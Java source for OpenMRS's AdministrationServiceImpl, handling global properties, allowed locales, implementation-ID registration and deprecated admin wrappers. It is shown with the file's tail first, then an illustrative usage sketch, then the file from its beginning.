"" : Context.getMessageSourceService().getMessage("Module.notStarted")); put(module.getName(), moduleInfo); } } }); return systemInfoMap; } /** * @param bytes to be converted into mega bytes * @return memory in mega bytes */ private String convertToMegaBytes(long bytes) { int ONE_KILO_BYTE = 1024; return String.valueOf(bytes / ONE_KILO_BYTE / ONE_KILO_BYTE) + " MB"; } /** * @see org.openmrs.api.AdministrationService#purgeGlobalProperties(java.util.List) */ @Override public void purgeGlobalProperties(List<GlobalProperty> globalProperties) throws APIException { for (GlobalProperty globalProperty : globalProperties) { Context.getAdministrationService().purgeGlobalProperty(globalProperty); } } /** * @see AdministrationService#getMaximumPropertyLength(Class, String) */ @Override @Transactional(readOnly = true) public int getMaximumPropertyLength(Class<? extends OpenmrsObject> aClass, String fieldName) { return dao.getMaximumPropertyLength(aClass, fieldName); } /** * @see org.openmrs.api.AdministrationService#validate(java.lang.Object, Errors) */ @Override @Transactional(readOnly = true) public void validate(Object object, Errors errors) throws APIException { if (object == null) throw new APIException(Context.getMessageSourceService().getMessage("error.null")); dao.validate(object, errors); } /** * @see org.openmrs.api.AdministrationService#getSearchLocales(org.openmrs.User) */ @Override @Transactional(readOnly = true) public List<Locale> getSearchLocales() throws APIException { Set<Locale> locales = new LinkedHashSet<Locale>(); Locale currentLocale = Context.getLocale(); locales.add(currentLocale); //the currently used full locale //the currently used language locales.add(new Locale(currentLocale.getLanguage())); //add user's proficient locales User user = Context.getAuthenticatedUser(); if (user != null) { List<Locale> proficientLocales = user.getProficientLocales(); if (proficientLocales != null) { locales.addAll(proficientLocales); } } //limit locales to only allowed locales List<Locale> allowedLocales = getAllowedLocales(); if (allowedLocales != null) { Set<Locale> retainLocales = new HashSet<Locale>(); for (Locale allowedLocale : allowedLocales) { retainLocales.add(allowedLocale); retainLocales.add(new Locale(allowedLocale.getLanguage())); } locales.retainAll(retainLocales); } return new ArrayList<Locale>(locales); } @Override public void setImplementationIdHttpClient(HttpClient implementationIdHttpClient) { this.implementationIdHttpClient = implementationIdHttpClient; } }
api/src/main/java/org/openmrs/api/impl/AdministrationServiceImpl.java
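For orientation, the sketch below shows how calling code would typically exercise the global-property API defined in the service above. It is illustrative only and not part of the repository: the class name GlobalPropertyExample, the demo() method, and the example.lastRun / example.batchSize property names are invented for this example, and it assumes an OpenMRS Context that has already been opened and authenticated elsewhere.

// Hypothetical caller of the AdministrationService global-property API (not part of the repository).
// Assumes Context.openSession() and authentication have already happened.
import java.util.List;
import java.util.Locale;
import org.openmrs.GlobalProperty;
import org.openmrs.api.AdministrationService;
import org.openmrs.api.GlobalPropertyListener;
import org.openmrs.api.context.Context;
import org.openmrs.util.OpenmrsConstants;

public class GlobalPropertyExample {

	public static void demo() {
		AdministrationService adminService = Context.getAdministrationService();

		// Plain read with a fallback: getGlobalProperty(name, default) returns the default when the property is unset.
		String allowedLocales = adminService.getGlobalProperty(OpenmrsConstants.GLOBAL_PROPERTY_LOCALE_ALLOWED_LIST, "en_GB");

		// Create-or-update: setGlobalProperty creates the GlobalProperty row if it does not exist yet.
		adminService.setGlobalProperty("example.lastRun", "2012-01-01");

		// Typed read: the default value's class must expose a String constructor (see getGlobalPropertyValue above).
		Integer batchSize = adminService.getGlobalPropertyValue("example.batchSize", Integer.valueOf(50));

		// Locales the UI may present, backed by the allowed-locale global property.
		List<Locale> locales = adminService.getAllowedLocales();
		System.out.println(allowedLocales + " / " + batchSize + " / " + locales);

		// React to changes of one specific property by registering a GlobalPropertyListener.
		adminService.addGlobalPropertyListener(new GlobalPropertyListener() {

			public boolean supportsPropertyName(String propertyName) {
				return "example.batchSize".equals(propertyName);
			}

			public void globalPropertyChanged(GlobalProperty newValue) {
				// re-read any cached configuration here
			}

			public void globalPropertyDeleted(String propertyName) {
				// fall back to defaults here
			}
		});
	}
}

Note the design split visible in the service itself: setGlobalProperty and saveGlobalProperty create the row when the property does not yet exist, whereas updateGlobalProperty throws IllegalStateException for an unknown property name, which is why the sketch uses setGlobalProperty for create-or-update semantics.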
/** * The contents of this file are subject to the OpenMRS Public License * Version 1.0 (the "License"); you may not use this file except in * compliance with the License. You may obtain a copy of the License at * http://license.openmrs.org * * Software distributed under the License is distributed on an "AS IS" * basis, WITHOUT WARRANTY OF ANY KIND, either express or implied. See the * License for the specific language governing rights and limitations * under the License. * * Copyright (C) OpenMRS, LLC. All Rights Reserved. */ package org.openmrs.api.impl; import java.io.StringWriter; import java.io.UnsupportedEncodingException; import java.net.InetAddress; import java.net.UnknownHostException; import java.text.SimpleDateFormat; import java.util.ArrayList; import java.util.Calendar; import java.util.Collection; import java.util.HashMap; import java.util.HashSet; import java.util.LinkedHashMap; import java.util.LinkedHashSet; import java.util.List; import java.util.Locale; import java.util.Map; import java.util.Properties; import java.util.Set; import java.util.SortedMap; import java.util.TreeMap; import org.apache.commons.logging.Log; import org.apache.commons.logging.LogFactory; import org.openmrs.Concept; import org.openmrs.ConceptClass; import org.openmrs.ConceptDatatype; import org.openmrs.ConceptProposal; import org.openmrs.ConceptSource; import org.openmrs.EncounterType; import org.openmrs.FieldType; import org.openmrs.GlobalProperty; import org.openmrs.ImplementationId; import org.openmrs.Location; import org.openmrs.MimeType; import org.openmrs.OpenmrsObject; import org.openmrs.PatientIdentifierType; import org.openmrs.Privilege; import org.openmrs.Role; import org.openmrs.Tribe; import org.openmrs.User; import org.openmrs.api.APIAuthenticationException; import org.openmrs.api.APIException; import org.openmrs.api.AdministrationService; import org.openmrs.api.EventListeners; import org.openmrs.api.GlobalPropertyListener; import org.openmrs.api.context.Context; import org.openmrs.api.db.AdministrationDAO; import org.openmrs.customdatatype.CustomDatatypeUtil; import org.openmrs.module.Module; import org.openmrs.module.ModuleFactory; import org.openmrs.module.ModuleUtil; import org.openmrs.reporting.AbstractReportObject; import org.openmrs.reporting.Report; import org.openmrs.util.HttpClient; import org.openmrs.util.LocaleUtility; import org.openmrs.util.OpenmrsConstants; import org.openmrs.util.OpenmrsUtil; import org.openmrs.util.PrivilegeConstants; import org.springframework.transaction.annotation.Transactional; import org.springframework.util.StringUtils; import org.springframework.validation.Errors; /** * Default implementation of the administration services. This class should not be used on its own. * The current OpenMRS implementation should be fetched from the Context * * @see org.openmrs.api.AdministrationService * @see org.openmrs.api.context.Context */ @Transactional public class AdministrationServiceImpl extends BaseOpenmrsService implements AdministrationService, GlobalPropertyListener { protected Log log = LogFactory.getLog(getClass()); protected AdministrationDAO dao; private EventListeners eventListeners; /** * An always up-to-date collection of the allowed locales. 
*/ private GlobalLocaleList globalLocaleList; private HttpClient implementationIdHttpClient; /** * Default empty constructor */ public AdministrationServiceImpl() { } /** * @see org.openmrs.api.AdministrationService#setAdministrationDAO(org.openmrs.api.db.AdministrationDAO) */ public void setAdministrationDAO(AdministrationDAO dao) { this.dao = dao; } public void setEventListeners(EventListeners eventListeners) { this.eventListeners = eventListeners; } /** * @see org.openmrs.api.AdministrationService#createEncounterType(org.openmrs.EncounterType) * @deprecated */ @Deprecated public void createEncounterType(EncounterType encounterType) throws APIException { Context.getEncounterService().saveEncounterType(encounterType); } /** * @see org.openmrs.api.AdministrationService#updateEncounterType(org.openmrs.EncounterType) * @deprecated */ @Deprecated public void updateEncounterType(EncounterType encounterType) throws APIException { Context.getEncounterService().saveEncounterType(encounterType); } /** * @see org.openmrs.api.AdministrationService#deleteEncounterType(org.openmrs.EncounterType) * @deprecated */ @Deprecated public void deleteEncounterType(EncounterType encounterType) throws APIException { Context.getEncounterService().purgeEncounterType(encounterType); } /** * @see org.openmrs.api.PatientService#savePatientIdentifierType(PatientIdentifierType) * @deprecated replaced by * {@link org.openmrs.api.PatientService#savePatientIdentifierType(PatientIdentifierType)} */ @Deprecated public void createPatientIdentifierType(PatientIdentifierType patientIdentifierType) throws APIException { Context.getPatientService().savePatientIdentifierType(patientIdentifierType); } /** * @see org.openmrs.api.PatientService#savePatientIdentifierType(PatientIdentifierType) * @deprecated replaced by * {@link org.openmrs.api.PatientService#savePatientIdentifierType(PatientIdentifierType)} */ @Deprecated public void updatePatientIdentifierType(PatientIdentifierType patientIdentifierType) throws APIException { Context.getPatientService().savePatientIdentifierType(patientIdentifierType); } /** * @see org.openmrs.api.PatientService#purgePatientIdentifierType(PatientIdentifierType) * @deprecated replaced by * {@link org.openmrs.api.PatientService#purgePatientIdentifierType(PatientIdentifierType)} */ @Deprecated public void deletePatientIdentifierType(PatientIdentifierType patientIdentifierType) throws APIException { Context.getPatientService().purgePatientIdentifierType(patientIdentifierType); } /** * Create a new Tribe * * @param tribe Tribe to create * @throws APIException * @deprecated */ @Deprecated public void createTribe(Tribe tribe) throws APIException { throw new APIException("The Tribe object is no longer supported. Install the Tribe module"); } /** * Update Tribe * * @param tribe Tribe to update * @throws APIException * @deprecated */ @Deprecated public void updateTribe(Tribe tribe) throws APIException { throw new APIException("The Tribe object is no longer supported. Install the Tribe module"); } /** * Delete Tribe * * @param tribe Tribe to delete * @throws APIException * @deprecated */ @Deprecated public void deleteTribe(Tribe tribe) throws APIException { throw new APIException("The Tribe object is no longer supported. Install the Tribe module"); } /** * Retire Tribe * * @param tribe Tribe to retire * @throws APIException * @deprecated */ @Deprecated public void retireTribe(Tribe tribe) throws APIException { throw new APIException("The Tribe object is no longer supported. 
Install the Tribe module"); } /** * Unretire Tribe * * @param tribe Tribe to unretire * @throws APIException * @deprecated */ @Deprecated public void unretireTribe(Tribe tribe) throws APIException { throw new APIException("The Tribe object is no longer supported. Install the Tribe module"); } /** * @deprecated */ @Deprecated public void createFieldType(FieldType fieldType) throws APIException { Context.getFormService().saveFieldType(fieldType); } /** * @deprecated */ @Deprecated public void updateFieldType(FieldType fieldType) throws APIException { Context.getFormService().saveFieldType(fieldType); } /** * @deprecated */ @Deprecated public void deleteFieldType(FieldType fieldType) throws APIException { Context.getFormService().purgeFieldType(fieldType); } /** * @deprecated use {@link org.openmrs.api.ObsService#saveMimeType(MimeType)} */ @Deprecated public void createMimeType(MimeType mimeType) throws APIException { Context.getObsService().saveMimeType(mimeType); } /** * @deprecated use {@link org.openmrs.api.ObsService#saveMimeType(MimeType)} */ @Deprecated public void updateMimeType(MimeType mimeType) throws APIException { Context.getObsService().saveMimeType(mimeType); } /** * @deprecated use {@link org.openmrs.api.ObsService#purgeMimeType(MimeType)} */ @Deprecated public void deleteMimeType(MimeType mimeType) throws APIException { Context.getObsService().purgeMimeType(mimeType); } /** * @see org.openmrs.api.AdministrationService#createLocation(org.openmrs.Location) * @deprecated */ @Deprecated public void createLocation(Location location) throws APIException { Context.getLocationService().saveLocation(location); } /** * @see org.openmrs.api.AdministrationService#updateLocation(org.openmrs.Location) * @deprecated */ @Deprecated public void updateLocation(Location location) throws APIException { Context.getLocationService().saveLocation(location); } /** * @see org.openmrs.api.AdministrationService#deleteLocation(org.openmrs.Location) * @deprecated */ @Deprecated public void deleteLocation(Location location) throws APIException { Context.getLocationService().purgeLocation(location); } /** * @see org.openmrs.api.AdministrationService#createRole(org.openmrs.Role) * @deprecated */ @Deprecated public void createRole(Role role) throws APIException { Context.getUserService().saveRole(role); } /** * @see org.openmrs.api.AdministrationService#updateRole(org.openmrs.Role) * @deprecated */ @Deprecated public void updateRole(Role role) throws APIException { Context.getUserService().saveRole(role); } /** * @see org.openmrs.api.AdministrationService#deleteRole(org.openmrs.Role) * @deprecated */ @Deprecated public void deleteRole(Role role) throws APIException { Context.getUserService().purgeRole(role); } /** * @see org.openmrs.api.AdministrationService#createPrivilege(org.openmrs.Privilege) * @deprecated */ @Deprecated public void createPrivilege(Privilege privilege) throws APIException { Context.getUserService().savePrivilege(privilege); } /** * @see org.openmrs.api.AdministrationService#updatePrivilege(org.openmrs.Privilege) * @deprecated */ @Deprecated public void updatePrivilege(Privilege privilege) throws APIException { Context.getUserService().savePrivilege(privilege); } /** * @see org.openmrs.api.AdministrationService#deletePrivilege(org.openmrs.Privilege) * @deprecated */ @Deprecated public void deletePrivilege(Privilege privilege) throws APIException { Context.getUserService().purgePrivilege(privilege); } /** * @deprecated moved to ConceptService */ @Deprecated public void 
createConceptClass(ConceptClass cc) throws APIException { Context.getConceptService().saveConceptClass(cc); } /** * @deprecated moved to ConceptService */ @Deprecated public void updateConceptClass(ConceptClass cc) throws APIException { Context.getConceptService().saveConceptClass(cc); } /** * @deprecated moved to ConceptService */ @Deprecated public void deleteConceptClass(ConceptClass cc) throws APIException { Context.getConceptService().purgeConceptClass(cc); } /** * @deprecated moved to ConceptService */ @Deprecated public void createConceptDatatype(ConceptDatatype cd) throws APIException { Context.getConceptService().saveConceptDatatype(cd); } /** * @deprecated moved to ConceptService */ @Deprecated public void updateConceptDatatype(ConceptDatatype cd) throws APIException { Context.getConceptService().saveConceptDatatype(cd); } /** * @deprecated moved to ConceptService */ @Deprecated public void deleteConceptDatatype(ConceptDatatype cd) throws APIException { Context.getConceptService().purgeConceptDatatype(cd); } /** * Create a new Report * * @param report Report to create * @deprecated see reportingcompatibility module * @throws APIException */ @Deprecated public void createReport(Report report) throws APIException { if (!Context.hasPrivilege(OpenmrsConstants.PRIV_ADD_REPORTS)) throw new APIAuthenticationException("Privilege required: " + OpenmrsConstants.PRIV_ADD_REPORTS); dao.createReport(report); } /** * Update Report * * @param report Report to update * @deprecated see reportingcompatibility module * @throws APIException */ @Deprecated public void updateReport(Report report) throws APIException { if (!Context.hasPrivilege(OpenmrsConstants.PRIV_EDIT_REPORTS)) throw new APIAuthenticationException("Privilege required: " + OpenmrsConstants.PRIV_EDIT_REPORTS); dao.updateReport(report); } /** * Delete Report * * @param report Report to delete * @deprecated see reportingcompatibility module * @throws APIException */ @Deprecated public void deleteReport(Report report) throws APIException { if (!Context.hasPrivilege(OpenmrsConstants.PRIV_DELETE_REPORTS)) throw new APIAuthenticationException("Privilege required: " + OpenmrsConstants.PRIV_DELETE_REPORTS); dao.deleteReport(report); } /** * Create a new Report Object * * @param reportObject Report Object to create * @deprecated see reportingcompatibility module * @throws APIException */ @Deprecated public void createReportObject(AbstractReportObject reportObject) throws APIException { if (!Context.hasPrivilege(OpenmrsConstants.PRIV_ADD_REPORT_OBJECTS)) throw new APIAuthenticationException("Privilege required: " + OpenmrsConstants.PRIV_ADD_REPORT_OBJECTS); dao.createReportObject(reportObject); } /** * Update Report Object * * @param reportObject Report Object to update * @deprecated see reportingcompatibility module * @throws APIException */ @Deprecated public void updateReportObject(AbstractReportObject reportObject) throws APIException { if (!Context.hasPrivilege(OpenmrsConstants.PRIV_EDIT_REPORT_OBJECTS)) throw new APIAuthenticationException("Privilege required: " + OpenmrsConstants.PRIV_EDIT_REPORT_OBJECTS); dao.updateReportObject(reportObject); } /** * Delete Report Object * * @param reportObjectId Internal Integer identifier of Report Object to delete * @deprecated see reportingcompatibility module * @throws APIException */ @Deprecated public void deleteReportObject(Integer reportObjectId) throws APIException { if (!Context.hasPrivilege(OpenmrsConstants.PRIV_DELETE_REPORT_OBJECTS)) throw new APIAuthenticationException("Privilege 
required: " + OpenmrsConstants.PRIV_DELETE_REPORT_OBJECTS); dao.deleteReportObject(reportObjectId); } /** * @deprecated moved to ConceptServiceImpl */ @Deprecated public void updateConceptWord(Concept concept) throws APIException { Context.getConceptService().updateConceptWord(concept); } /** * @deprecated moved to ConceptServiceImpl */ @Deprecated public void updateConceptWords() throws APIException { Context.getConceptService().updateConceptWords(); } /** * @deprecated moved to ConceptService */ @Deprecated public void updateConceptWords(Integer conceptIdStart, Integer conceptIdEnd) throws APIException { Context.getConceptService().updateConceptWords(conceptIdStart, conceptIdEnd); } /** * @deprecated moved to ConceptService */ @Deprecated public void createConceptProposal(ConceptProposal cp) throws APIException { Context.getConceptService().saveConceptProposal(cp); } /** * @deprecated moved to ConceptService */ @Deprecated public void updateConceptProposal(ConceptProposal cp) throws APIException { Context.getConceptService().saveConceptProposal(cp); } /** * @deprecated moved to ConceptService */ @Deprecated public void mapConceptProposalToConcept(ConceptProposal cp, Concept mappedConcept) throws APIException { Context.getConceptService().mapConceptProposalToConcept(cp, mappedConcept); } /** * @deprecated moved to ConceptService * @see org.openmrs.api.AdministrationService#rejectConceptProposal(org.openmrs.ConceptProposal) */ @Deprecated public void rejectConceptProposal(ConceptProposal cp) { Context.getConceptService().rejectConceptProposal(cp); } /** * @see org.openmrs.api.AdministrationService#mrnGeneratorLog(java.lang.String, * java.lang.Integer, java.lang.Integer) * @deprecated */ @Deprecated public void mrnGeneratorLog(String site, Integer start, Integer count) throws APIException { if (!Context.hasPrivilege(PrivilegeConstants.EDIT_PATIENTS)) throw new APIAuthenticationException("Privilege required: " + PrivilegeConstants.EDIT_PATIENTS); dao.mrnGeneratorLog(site, start, count); } /** * @see org.openmrs.api.AdministrationService#getMRNGeneratorLog() * @deprecated */ @Deprecated @Transactional(readOnly = true) public Collection<?> getMRNGeneratorLog() throws APIException { if (!Context.hasPrivilege(PrivilegeConstants.EDIT_PATIENTS)) throw new APIAuthenticationException("Privilege required: " + PrivilegeConstants.EDIT_PATIENTS); return dao.getMRNGeneratorLog(); } /** * Static-ish variable used to cache the system variables. This is not static so that every time * a module is loaded or removed the variable is destroyed (along with the administration * service) and recreated the next time it is called */ protected SortedMap<String, String> systemVariables = null; /** * Set of locales which can be used to present messages in the user interface. Created lazily as * needed by {@link #getAllowedLocales()}. 
*/ private HashSet<Locale> presentationLocales; /** * @see org.openmrs.api.AdministrationService#getSystemVariables() */ @Transactional(readOnly = true) public SortedMap<String, String> getSystemVariables() throws APIException { if (systemVariables == null) { systemVariables = new TreeMap<String, String>(); // Added the server's fully qualified domain name try { systemVariables.put("OPENMRS_HOSTNAME", InetAddress.getLocalHost().getCanonicalHostName()); } catch (UnknownHostException e) { systemVariables.put("OPENMRS_HOSTNAME", "Unknown host: " + e.getMessage()); } systemVariables.put("OPENMRS_VERSION", String.valueOf(OpenmrsConstants.OPENMRS_VERSION)); systemVariables.put("DATABASE_NAME", OpenmrsConstants.DATABASE_NAME); systemVariables.put("DATABASE_BUSINESS_NAME", OpenmrsConstants.DATABASE_BUSINESS_NAME); systemVariables.put("OBSCURE_PATIENTS", String.valueOf(OpenmrsConstants.OBSCURE_PATIENTS)); systemVariables.put("OBSCURE_PATIENTS_FAMILY_NAME", OpenmrsConstants.OBSCURE_PATIENTS_FAMILY_NAME); systemVariables.put("OBSCURE_PATIENTS_GIVEN_NAME", OpenmrsConstants.OBSCURE_PATIENTS_GIVEN_NAME); systemVariables.put("OBSCURE_PATIENTS_MIDDLE_NAME", OpenmrsConstants.OBSCURE_PATIENTS_MIDDLE_NAME); systemVariables.put("MODULE_REPOSITORY_PATH", ModuleUtil.getModuleRepository().getAbsolutePath()); systemVariables.put("OPERATING_SYSTEM_KEY", String.valueOf(OpenmrsConstants.OPERATING_SYSTEM_KEY)); systemVariables.put("OPERATING_SYSTEM", String.valueOf(OpenmrsConstants.OPERATING_SYSTEM)); } return systemVariables; } /** * @see org.openmrs.api.AdministrationService#getGlobalProperty(java.lang.String) */ @Transactional(readOnly = true) public String getGlobalProperty(String propertyName) throws APIException { // This method should not have any authorization check if (propertyName == null) return null; return dao.getGlobalProperty(propertyName); } /** * @see org.openmrs.api.AdministrationService#getGlobalProperty(java.lang.String, * java.lang.String) */ @Transactional(readOnly = true) public String getGlobalProperty(String propertyName, String defaultValue) throws APIException { String s = getGlobalProperty(propertyName); if (s == null) return defaultValue; return s; } /** * @see org.openmrs.api.AdministrationService#getGlobalPropertyObject(java.lang.String) */ @Transactional(readOnly = true) public GlobalProperty getGlobalPropertyObject(String propertyName) { return dao.getGlobalPropertyObject(propertyName); } /** * @see org.openmrs.api.AdministrationService#getGlobalProperties() * @deprecated */ @Deprecated @Transactional(readOnly = true) public List<GlobalProperty> getGlobalProperties() throws APIException { return getAllGlobalProperties(); } /** * @see org.openmrs.api.AdministrationService#setGlobalProperties(java.util.List) * @deprecated */ @Deprecated public void setGlobalProperties(List<GlobalProperty> props) throws APIException { Context.getAdministrationService().saveGlobalProperties(props); } /** * @see org.openmrs.api.AdministrationService#deleteGlobalProperty(java.lang.String) * @deprecated */ @Deprecated public void deleteGlobalProperty(String propertyName) throws APIException { purgeGlobalProperty(new GlobalProperty(propertyName)); } /** * @see org.openmrs.api.AdministrationService#setGlobalProperty(java.lang.String, * java.lang.String) */ public void setGlobalProperty(String propertyName, String propertyValue) throws APIException { GlobalProperty gp = getGlobalPropertyObject(propertyName); if (gp == null) { gp = new GlobalProperty(); gp.setProperty(propertyName); } 
gp.setPropertyValue(propertyValue); dao.saveGlobalProperty(gp); } /** * @see org.openmrs.api.AdministrationService#updateGlobalProperty(java.lang.String, * java.lang.String) */ public void updateGlobalProperty(String propertyName, String propertyValue) throws IllegalStateException { GlobalProperty gp = getGlobalPropertyObject(propertyName); if (gp == null) { throw new IllegalStateException("Global property with the given propertyName does not exist" + propertyName); } gp.setPropertyValue(propertyValue); dao.saveGlobalProperty(gp); } /** * @see org.openmrs.api.AdministrationService#setGlobalProperty(org.openmrs.GlobalProperty) * @deprecated */ @Deprecated public void setGlobalProperty(GlobalProperty gp) throws APIException { Context.getAdministrationService().saveGlobalProperty(gp); } /** * @see org.openmrs.api.AdministrationService#addGlobalProperty(org.openmrs.GlobalProperty) * @deprecated */ @Deprecated public void addGlobalProperty(GlobalProperty gp) { setGlobalProperty(gp); } /** * @see org.openmrs.api.AdministrationService#addGlobalProperty(java.lang.String, * java.lang.String) * @deprecated */ @Deprecated public void addGlobalProperty(String propertyName, String propertyValue) throws APIException { //dao.addGlobalProperty(propertyName, propertyValue); Context.getAdministrationService().saveGlobalProperty(new GlobalProperty(propertyName, propertyValue)); } /** * @see org.openmrs.api.AdministrationService#getAllGlobalProperties() */ @Transactional(readOnly = true) public List<GlobalProperty> getAllGlobalProperties() throws APIException { return dao.getAllGlobalProperties(); } /** * @see org.openmrs.api.AdministrationService#getGlobalPropertiesByPrefix(java.lang.String) */ @Transactional(readOnly = true) public List<GlobalProperty> getGlobalPropertiesByPrefix(String prefix) { return dao.getGlobalPropertiesByPrefix(prefix); } /** * @see org.openmrs.api.AdministrationService#getGlobalPropertiesBySuffix(java.lang.String) */ @Transactional(readOnly = true) public List<GlobalProperty> getGlobalPropertiesBySuffix(String suffix) { return dao.getGlobalPropertiesBySuffix(suffix); } /** * @see org.openmrs.api.AdministrationService#purgeGlobalProperty(org.openmrs.GlobalProperty) */ public void purgeGlobalProperty(GlobalProperty globalProperty) throws APIException { notifyGlobalPropertyDelete(globalProperty.getProperty()); dao.deleteGlobalProperty(globalProperty); } /** * @see org.openmrs.api.AdministrationService#saveGlobalProperties(java.util.List) */ public List<GlobalProperty> saveGlobalProperties(List<GlobalProperty> props) throws APIException { log.debug("saving a list of global properties"); // add all of the new properties for (GlobalProperty prop : props) { if (prop.getProperty() != null && prop.getProperty().length() > 0) { Context.getAdministrationService().saveGlobalProperty(prop); } } return props; } /** * @see org.openmrs.api.AdministrationService#saveGlobalProperty(org.openmrs.GlobalProperty) */ public GlobalProperty saveGlobalProperty(GlobalProperty gp) throws APIException { // only try to save it if the global property has a key if (gp.getProperty() != null && gp.getProperty().length() > 0) { CustomDatatypeUtil.saveIfDirty(gp); dao.saveGlobalProperty(gp); notifyGlobalPropertyChange(gp); return gp; } return gp; } /** * @see org.openmrs.api.AdministrationService#executeSQL(java.lang.String, boolean) */ public List<List<Object>> executeSQL(String sql, boolean selectOnly) throws APIException { if (sql == null || sql.trim().equals("")) return null; return dao.executeSQL(sql, 
selectOnly); } /** * @see org.openmrs.api.AdministrationService#addGlobalPropertyListener(GlobalPropertyListener) */ public void addGlobalPropertyListener(GlobalPropertyListener listener) { eventListeners.getGlobalPropertyListeners().add(listener); } /** * @see org.openmrs.api.AdministrationService#removeGlobalPropertyListener(GlobalPropertyListener) */ public void removeGlobalPropertyListener(GlobalPropertyListener listener) { eventListeners.getGlobalPropertyListeners().remove(listener); } /** * Calls global property listeners registered for this create/change * * @param gp */ private void notifyGlobalPropertyChange(GlobalProperty gp) { for (GlobalPropertyListener listener : eventListeners.getGlobalPropertyListeners()) if (listener.supportsPropertyName(gp.getProperty())) listener.globalPropertyChanged(gp); } /** * Calls global property listeners registered for this delete * * @param propertyName */ private void notifyGlobalPropertyDelete(String propertyName) { for (GlobalPropertyListener listener : eventListeners.getGlobalPropertyListeners()) if (listener.supportsPropertyName(propertyName)) listener.globalPropertyDeleted(propertyName); } /** * @see org.openmrs.api.AdministrationService#getImplementationId() */ @Transactional(readOnly = true) public ImplementationId getImplementationId() throws APIException { String property = getGlobalProperty(OpenmrsConstants.GLOBAL_PROPERTY_IMPLEMENTATION_ID); // fail early if no gp has been defined yet if (property == null) return null; try { ImplementationId implId = OpenmrsUtil.getSerializer().read(ImplementationId.class, property); return implId; } catch (Throwable t) { log.debug("Error while getting implementation id", t); } return null; } /** * @see org.openmrs.api.AdministrationService#setImplementationId(org.openmrs.ImplementationId) */ public void setImplementationId(ImplementationId implementationId) throws APIException { if (implementationId == null) return; // check the validity of this implementation id with the server String description = implementationId.getDescription(); try { // check that source id is valid description = checkImplementationIdValidity(implementationId.getImplementationId(), description, implementationId.getPassphrase()); // save the server's description back to this concept source object implementationId.setDescription(description); boolean foundMatchingSource = false; // loop over the concept sources to make sure one exists for this hl7Code/implementationId List<ConceptSource> sources = Context.getConceptService().getAllConceptSources(); if (sources != null) { for (ConceptSource source : sources) { if (implementationId.getImplementationId().equals(source.getHl7Code())) { foundMatchingSource = true; } } } // if no ConceptSource currently exists with this implementationId, save this implId // as a new ConceptSource if (!foundMatchingSource) { ConceptSource newConceptSource = new ConceptSource(); newConceptSource.setName(implementationId.getName()); newConceptSource.setDescription(implementationId.getDescription()); newConceptSource.setHl7Code(implementationId.getImplementationId()); if (Context.getAuthenticatedUser() == null) // (hackish) newConceptSource.setCreator(new User(1)); // fake the user because no one is logged in Context.getConceptService().saveConceptSource(newConceptSource); } // serialize and save the ImplementationId to the global properties table StringWriter stringWriter = new StringWriter(); OpenmrsUtil.getSerializer().write(implementationId, stringWriter); 
Context.getAdministrationService().saveGlobalProperty( new GlobalProperty(OpenmrsConstants.GLOBAL_PROPERTY_IMPLEMENTATION_ID, stringWriter.toString())); } catch (APIException e) { throw e; } catch (Exception e) { // pass any other exceptions on up the train throw new APIException(e); } finally { // save an empty concept source to the database when something fails? } } /** * Checks the remote server for this exact implementation id. Returns the description if 1) * there is no implementation id or 2) there is a implementation id and this passphrase matches * it. In the case of 1), this implementation id and passphrase are saved to the remote server's * database * * @param implementationId * @param description * @param passphrase * @return the stored description on the remote server * @throws APIException * @throws UnsupportedEncodingException */ private String checkImplementationIdValidity(String implementationId, String description, String passphrase) throws APIException { if (!StringUtils.hasLength(implementationId)) throw new APIException("The implementationid cannot be empty"); if (!StringUtils.hasLength(description)) throw new APIException("The description cannot be empty"); if (!StringUtils.hasLength(passphrase)) throw new APIException("The passphrase cannot be empty"); // set up the data map to post to the openmrs server Map<String, String> data = new HashMap<String, String>(); data.put("implementationId", implementationId); data.put("description", description); data.put("passphrase", passphrase); String response = implementationIdHttpClient.post(data); response = response.trim(); if ("".equals(response)) { String ms = Context.getMessageSourceService().getMessage("ImplementationId.connectionError", new String[] { implementationId }, Context.getLocale()); throw new APIException(ms); } if (log.isDebugEnabled()) log.debug("Response: " + response); if (response.startsWith("Success")) { response = response.replace("Success", ""); return response.trim(); } String ms = Context.getMessageSourceService().getMessage("ImplementationId.invalidIdorPassphrase", new String[] { description }, Context.getLocale()); throw new APIException(ms); } /** * @see org.openmrs.api.AdministrationService#getAllowedLocales() */ @Transactional(readOnly = true) public List<Locale> getAllowedLocales() { // lazy-load the global locale list and initialize with current global property value if (globalLocaleList == null) { globalLocaleList = new GlobalLocaleList(); addGlobalPropertyListener(globalLocaleList); } Set<Locale> allowedLocales = globalLocaleList.getAllowedLocales(); // update the GlobalLocaleList.allowedLocales by faking a global property change if (allowedLocales == null) { // use a default language of "english" if they have cleared this GP for some reason String currentPropertyValue = getGlobalProperty(OpenmrsConstants.GLOBAL_PROPERTY_LOCALE_ALLOWED_LIST, LocaleUtility.getDefaultLocale().toString()); GlobalProperty allowedLocalesProperty = new GlobalProperty(OpenmrsConstants.GLOBAL_PROPERTY_LOCALE_ALLOWED_LIST, currentPropertyValue); globalLocaleList.globalPropertyChanged(allowedLocalesProperty); allowedLocales = globalLocaleList.getAllowedLocales(); } // allowedLocales is guaranteed to not be null at this point return new ArrayList<Locale>(allowedLocales); } /** * Used by spring to set the GlobalLocaleList on this implementation * * @param gll the GlobalLocaleList object that is registered to the GlobalPropertyListeners as * well */ public void setGlobalLocaleList(GlobalLocaleList gll) { globalLocaleList = 
gll; } /** * @see org.openmrs.api.AdministrationService#getPresentationLocales() */ @Transactional(readOnly = true) public Set<Locale> getPresentationLocales() { if (presentationLocales == null) { presentationLocales = new HashSet<Locale>(); Collection<Locale> messageLocales = Context.getMessageSourceService().getLocales(); List<Locale> allowedLocales = getAllowedLocales(); for (Locale possibleLocale : messageLocales) { if (allowedLocales.contains(possibleLocale)) { presentationLocales.add(possibleLocale); } else { // to be sure, check for language-only matches for (Locale allowedLocale : allowedLocales) { if (("".equals(allowedLocale.getCountry()) || "".equals(possibleLocale.getCountry())) && (allowedLocale.getLanguage().equals(possibleLocale.getLanguage()))) { presentationLocales.add(possibleLocale); break; } } } } } return presentationLocales; } /** * @see org.openmrs.api.GlobalPropertyListener#globalPropertyChanged(org.openmrs.GlobalProperty) */ public void globalPropertyChanged(GlobalProperty newValue) { if (newValue.getProperty().equals(OpenmrsConstants.GLOBAL_PROPERTY_LOCALE_ALLOWED_LIST)) { // reset the calculated locale values presentationLocales = null; } } /** * @see org.openmrs.api.GlobalPropertyListener#globalPropertyDeleted(java.lang.String) */ public void globalPropertyDeleted(String propertyName) { // TODO Auto-generated method stub } /** * @see 